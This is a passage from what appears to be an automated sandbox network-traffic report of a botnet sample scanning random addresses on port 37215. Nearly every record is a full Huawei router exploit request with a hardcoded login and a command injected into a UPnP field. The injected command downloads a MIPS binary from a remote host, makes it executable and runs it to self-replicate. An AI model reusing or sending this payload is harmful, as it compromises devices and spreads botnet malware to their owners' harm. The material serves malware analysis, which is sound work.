2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1643192.168.2.1557766116.214.184.18037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.906049013 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1644192.168.2.1541758157.89.2.17537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.906373978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1645192.168.2.153284841.5.30.12837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.906404972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1646192.168.2.1540224115.104.79.17837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.906431913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1647192.168.2.1541374197.162.23.14837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.910994053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1648192.168.2.155105041.132.140.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.911063910 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1649192.168.2.155513885.225.112.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.912478924 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1650192.168.2.1560660157.182.138.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.912589073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1651192.168.2.154776841.187.59.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.912803888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1652192.168.2.1549466157.175.130.3937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.912940025 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1653192.168.2.1548922131.79.186.3137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.913016081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
